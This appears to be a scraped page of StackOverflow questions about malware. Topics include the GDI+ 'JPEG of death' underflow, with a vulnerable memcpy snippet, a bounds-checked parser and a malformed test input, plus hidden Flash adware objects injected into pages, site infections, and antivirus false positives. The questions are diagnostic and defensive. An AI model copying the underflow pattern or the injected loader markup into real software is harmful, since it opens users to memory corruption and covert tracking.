malware interview questions
Top malware frequently asked interview questions
I’ve been reading about an older exploit against GDI+ on Windows XP and Windows Server 2003 called the JPEG of death for a project I’m working on.
The exploit is well explained in the following link:
http://www.infosecwriters.com/text_resources/pdf/JPEG.pdf
Basically, a JPEG file contains a section called COM containing a (possibly empty) comment field, and a two byte value containing the size of COM. If there are no comments, the size is 2. The reader (GDI+) reads the size, subtracts two, and allocates a buffer of the appropriate size to copy the comments in the heap.
The attack involves placing a value of 0 in the field. GDI+ subtracts 2, leading to a value of -2 (0xFFFe) which gets converted to the unsigned integer 0XFFFFFFFE by memcpy.
Sample code:
unsigned int size;
size = len - 2;
char *comment = (char *)malloc(size + 1);
memcpy(comment, src, size);
Observe that malloc(0) on the third line should return a pointer to unallocated memory on the heap. How can writing 0XFFFFFFFE bytes (4GB!!!!) possibly not crash the program? Does this write beyond the heap area and into the space of other programs and the OS? What happens then?
As I understand memcpy, it simply copies n characters from the destination to the source. In this case, the source should be on the stack, the destination on the heap, and n is 4GB.
Source: (StackOverflow)
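The COM-length arithmetic the question describes, beside a bounds-checked COM parser, as an added example (not code from the question or the linked paper; the JPEG byte sequences are constructed for the demo, and the parser checks the 16-bit length before subtracting from it):

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The expression from the question: a 16-bit COM length of 0 minus 2 is
 * computed in int (-2) and then converted to unsigned, giving 0xFFFFFFFE,
 * the byte count memcpy would receive. No copy is performed here. */
unsigned int naive_comment_size(uint16_t com_len)
{
    unsigned int size = com_len - 2;                 /* int -2 -> 0xFFFFFFFE */
    return size;
}

/* Bounds-checked version: find the first COM (0xFFFE) segment and return its
 * text in a NUL-terminated heap buffer, or NULL with *err describing why.
 * The length field counts its own two bytes, so a value below 2 is rejected
 * before any subtraction, and every segment must fit inside the file. */
char *read_jpeg_comment(const uint8_t *buf, size_t len, const char **err)
{
    size_t off = 2;                                  /* skip SOI (FF D8) */
    if (len < 2 || buf[0] != 0xFF || buf[1] != 0xD8) { *err = "not a JPEG"; return NULL; }
    while (off + 4 <= len && buf[off] == 0xFF) {
        uint8_t marker = buf[off + 1];
        uint16_t seg_len = (uint16_t)((buf[off + 2] << 8) | buf[off + 3]);
        if (seg_len < 2) {                           /* the exploit's case */
            *err = "segment length < 2"; return NULL;
        }
        if ((size_t)seg_len > len - off - 2) {       /* length exceeds file */
            *err = "segment runs past end of file"; return NULL;
        }
        if (marker == 0xFE) {
            size_t body = (size_t)seg_len - 2;       /* cannot underflow */
            char *comment = malloc(body + 1);
            if (!comment) { *err = "out of memory"; return NULL; }
            memcpy(comment, buf + off + 4, body);
            comment[body] = '\0';
            *err = NULL;
            return comment;
        }
        if (marker == 0xDA)                          /* SOS: headers end */
            break;
        off += 2 + seg_len;                          /* marker + segment */
    }
    *err = "no COM segment";
    return NULL;
}

/* Constructed inputs: a minimal JPEG carrying the comment "hello", and one
 * whose COM length field is 0, the value the question describes. */
static const uint8_t GOOD_JPEG[] = {
    0xFF, 0xD8, 0xFF, 0xFE, 0x00, 0x07, 'h', 'e', 'l', 'l', 'o', 0xFF, 0xD9
};
static const uint8_t ZERO_LEN_JPEG[] = { 0xFF, 0xD8, 0xFF, 0xFE, 0x00, 0x00, 0xFF, 0xD9 };

/* Check helper: 1 if parsing yields comment `want_text`, or, when want_text
 * is NULL, fails with the error string `want_err`. Frees the buffer. */
int parse_gives(const uint8_t *buf, size_t len, const char *want_text, const char *want_err)
{
    const char *err = NULL;
    char *c = read_jpeg_comment(buf, len, &err);
    int ok = want_text ? (c != NULL && strcmp(c, want_text) == 0)
                       : (c == NULL && err != NULL && strcmp(err, want_err) == 0);
    free(c);
    return ok;
}

int main(void)
{
    printf("COM length 0 -> size 0x%08X\n", naive_comment_size(0));
    printf("good file parsed: %d\n", parse_gives(GOOD_JPEG, sizeof GOOD_JPEG, "hello", NULL));
    printf("zero length rejected: %d\n",
           parse_gives(ZERO_LEN_JPEG, sizeof ZERO_LEN_JPEG, NULL, "segment length < 2"));
    return 0;
}
```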
I have seen some Android apps on my phone require the android.permission.READ_PHONE_STATE permission. I don't know if I can trust them. I know this permission gives the app access to a lot of information. I'm particularly interested in what functionality in an Android app normally requires information like DeviceId, SimSerialNumber or SubscriberId?
Source: (StackOverflow)
I'm just curious. I always hear about C or assembly being the language of choice for viruses, and I wonder if any of the more arcane languages like Lisp or Scheme can be used for it too.
Source: (StackOverflow)
My website www.safwanmanpower.com is attacked by a malware script in each page. I don't know what this script is all about. Can anybody explain how this script makes my website malware affected??
Hoping for a quick and positive response.
Edited:
How can someone attack my website without permission to upload??
Source: (StackOverflow)
I am creating an Android web app using WebView and JavaScript, calling addJavascriptInterface(true).
My app will contain data (HTML) that will be loaded from an external site.
I am worried about the cross-site scripting (XSS) security of my app as I am enabling addJavascriptInterface(true).
What are the things I should take care of so that no malicious code can run in my app?
Source: (StackOverflow)
I found a strange thing hidden on my page:
<div id="SiUnhdqlqHN9t7wB_tbstore_container" style="left: -2000px; top: -2000px; position: absolute;">
<param name="movie" value="http://tbupdate.zugo.com/ztb/2.5/jsi/man/fc.swf"/>
<param name="allowScriptAccess" value="always"/>
EDIT: I see that it's there in Chrome too, not just IE, and I have all of the web-service search enhancements etc disabled in Advanced Settings.
EDIT: I examined the markup on a PC not in the office, and the Zugo was not present. Possibly only the PC or browsers on my PC at the office are affected.
YET ANOTHER EDIT: This seems to be the StartNow search extension. Wish I knew how it got installed on my PC at work.
I would be using this grid to track data that would be covered by HIPAA and need to know that the privacy is not being compromised. There should be nothing "phoning home" in this grid or on this page. Really.
PROGRAMMING ASPECT OF THE QUESTION: If allowScriptAccess is set to "always" can this SWF see everything in the DOM? And if the ID changes, is there any way for me to "kill" it using javascript?
Source: (StackOverflow)
In testing my local code, the following appears in my DOM ~2 seconds after loading:
<div style="position: absolute; top: 0px; left: 0px; width: 1px; height: 1px; z-index: 2147483647;" id="_GPL_e6a00_parent_div">
<object type="application/x-shockwave-flash" id="_GPL_e6a00_swf" data="http://savingsslider-a.akamaihd.net/items/e6a00/storage.swf" width="1" height="1">
<param name="wmode" value="transparent">
<param name="allowscriptaccess" value="always">
<param name="flashvars" value="logfn=_GPL.items.e6a00.log&onload=_GPL.items.e6a00.onload&onerror=_GPL.items.e6a00.onerror&LSOName=gpl">
</object>
</div>
I've run global searches for all of the keywords in the HTML but it's nowhere to be found in my project.
After that I tried disabling all of the external plugins I load, including Facebook's SDK, Mixpanel, Google Analytics, but it still shows up.
What else can I do to find the culprit?
Source: (StackOverflow)
I have an application I wrote for my company in Python 2.x, PyQT4, and MySQLdb and packaged with py2exe.
Recently, I made some updates to the application, porting it to Python 3.4 and PySide. I also removed the MySQLdb dependencies and added Requests. I packaged this with the newly-minted py2exe for Python 3.
Suddenly I'm getting flagged by Windows defender that my executable is malware. Here's the log entry:
Windows Defender has detected spyware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=BrowserModifier:Win32/Zwangi&threatid=144384
Name:BrowserModifier:Win32/Zwangi
ID:144384
Severity:High
Category:Browser Modifier
Path Found:file:C:\Users\alan.moore\Desktop\ticketuserclient3-beta1\ticketuserclient3\Contact tech support.exe
Detection Type:Concrete
Detection Source:Downloads and attachments
Status:Unknown
User:WILLIAMSON-TN\alan.moore
Process Name:C:\Windows\Explorer.EXE
So my questions are:
- Why am I being flagged as malware? How can I determine the exact reasons?
- Other than "allowing" this on all 600+ workstations that it needs to be deployed to, what can I do about it?
- What does "Detection Type: concrete" mean?
Thanks for any help.
UPDATE: Apparently anything I compile with py2exe under python3.4 gets identified like this.
I tried with this script:
import sys
import platform
print(sys.platform)
# platform.uname() must be called: the bare function object is not iterable
print("".join(platform.uname()))
And this setup.py
from distutils.core import setup
import os
import py2exe
setup(
windows=[{"script":"test.py", "dest_base":"Contact tech support"},],
options= {
"py2exe" : {
"compressed":1,
"optimize":2,
"bundle_files":3
}
},
zipfile = None
)
It's flagged as malware. (Win32/Zwangi).
Source: (StackOverflow)
I have created an Android application, but Avast detects it as malware. Why is this?
Can anyone give me some more info about this, so I can locate what exactly is considered a virus in this app? This is a very simple app, so I have no idea what might have caused this.
I have reported this as a false positive and also contacted Avast via their forum. But I guess it won't hurt to post here as well; maybe someone has/had a similar problem.
Source: (StackOverflow)
We use a tool to track JS errors which happen in the browser of our users. We sometimes see that underscore raises an error like TypeError: string is not a function because it is overwritten by a string looking like this:
Does anyone have an idea where this comes from and how to prevent this?
Source: (StackOverflow)
Sorry if this is not the right place to ask this, please LMK if this question would be suited better somewhere else!
I got a particularly interesting piece of junk mail sent to my work email. It is supposedly someone's resume, but it is actually a very obscure piece of JavaScript. It looks like it tries to launch a Windows executable via ActiveX. I think the goal of the attacker is to have you run the .js file directly as a Windows script. I ran it on my Windows 7 computer and Symantec Endpoint stopped it with a "Suspicious executable image download" warning. I ran it in a Windows XP VM without any antivirus installed, and I got a pop-up notification
2865241.exe - Appication Error The application failed to initialize properly (0xc0000135). Click on OK to terminate the application
followed by a notification from Windows Script Host
Script: C:\path\to\Resume Jaime Harding.js
Line: 9
Char: 1
Error: Write to file failed.
Code: 800A0BBC
Source: ADODB.Stream
So is it actually attempting to write a binary and run it? What might it be trying to accomplish? Why did it fail? I played the role of "gullible email recipient" and ran it, and it just bombed out. What environment might this succeed in?
A lot of the gibberish looks like it is possibly intentionally ugly variable names used as properties of window. However, there are a lot of "charAt"s, so maybe the strings are just a decoy and it is only extracting certain characters and using them. Several of the "functions" have arguments being passed in the form of (/regex/g,""), so it looks like that is trying to filter away garbage from the strings, but I can't tell where the actual call to replace is that would actually do the replacing.
Below is the JS; it is highly obfuscated. I beautified it for some semblance of readability.
Source: (StackOverflow)
Currently I am facing a hellish situation: four of my client websites were hacked 10 days ago. I messed around a lot with them and three of them are working fine (running Magento) after my long struggle with them, but one of them (running WordPress) is still facing the same situation and I could not figure out what was going on. After a particular time the JS files, and some PHP files too, are automatically injected with this kind of code:
<?
#ded509#
#/ded509#
?>
This code is injected in all JS files and main files. I changed FTP passwords, I checked cron jobs, and I manually looked for any PHP code (I feel like some PHP code is doing this), but I am unable to figure it out. And yes, I tried to decode this code and tried to work out its functionality. Removing this malicious code from my JS files makes my site fine for some time, but after a random time the scripts are auto-injected with this code again. What is this JS code actually? It would be very helpful if somebody could explain what is actually going on.
Source: (StackOverflow)
Suppose I want to run some program which requests too many permissions. For example, recording from the microphone or reading the IMEI of my phone. However, there is no practical explanation why recording from the mic or the IMEI number is needed for this particular application, except for data mining.
I want to try this app, but restrict its permissions. For example, if it reads IMEI, it should get random IMEI(but the same every time). If it tries to read the mic, it should get silence.
Some other interesting permissions:
- Phonebook read/write access - returns zero contacts, pretend that write is OK, but actually do nothing.
- Send SMS - pretend that SMS is sent, but do nothing.
- Get list of visible Wi-Fi networks - return zero networks.
Obviously the tool should require a rooted phone. Are there any such tools?
Source: (StackOverflow)
Good Day
I just uploaded a Wordpress theme onto my Website webserver. Now I tested this theme on my home server before with no problems.
Since it has been on the webserver (at a trusted hosting company), I get URL redirects to malicious sites when I am browsing through my website. (I have never given any account details to anyone; the account is only a week old.)
Here is my site: http://evolutionof4.co.za
The malicious sites it links to are: themeforest.net, carolini.net amongst others.
I have scanned all my files on the webserver for malware (with avast), I have also scanned my site with Sucuri Security, but it did not pick up anything.
I don't think it is malware on MY PC, since I got the same problem from another PC on my LAN...
Any help?
Thank you
Source: (StackOverflow)